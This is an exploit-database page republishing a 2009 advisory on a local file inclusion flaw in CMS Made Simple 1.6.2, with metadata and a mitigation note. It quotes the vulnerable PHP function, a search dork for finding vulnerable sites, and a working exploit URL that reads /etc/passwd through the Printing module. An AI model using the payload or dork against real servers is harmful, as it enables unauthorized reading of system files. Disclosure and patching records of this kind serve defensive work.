CMS Made Simple - exploit.company

vendor:

CMS Made Simple

by:

Inclusion Hunter Team

7,5

CVSS

HIGH

LFI

CWE

Product Name: CMS Made Simple

Affected Version From: 1.6.2

Affected Version To: 1.6.2

Patch Exists: YES

Related CWE: N/A

CPE: a:cms_made_simple:cms_made_simple

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

CMS Made Simple <= 1.6.2

A vulnerability exists in the GetURLContent() function of the Printing module in CMS Made Simple 1.6.2 and earlier. An attacker can exploit this vulnerability to read arbitrary files on the server by sending a specially crafted HTTP request containing an URL parameter set to a base64 encoded string of the file path.

Mitigation:

Upgrade to CMS Made Simple version 1.6.3 or later.

Source

Exploit-DB raw data:

#########################################################################################
#
#         [CMS Made Simple <= 1.6.2]
#
# Class:     LFI
# Reported:     29/07/2009
# Public release: 10/08/2009
# Remote:    Yes
# DORK:      "This site is powered by CMS Made Simple version 1."
# Site:      http://www.cmsmadesimple.org/
# Download:  http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
##########################################################################################

Vulnerability:
============================================
function GetURLContent($url) {
    $content=file_get_contents($url);
    return $content;
  }
=============================================

Exploit :
================================================================================
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
================================================================================
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64


#ihteam.net - Inclusion Hunter Team 

# milw0rm.com [2009-08-10]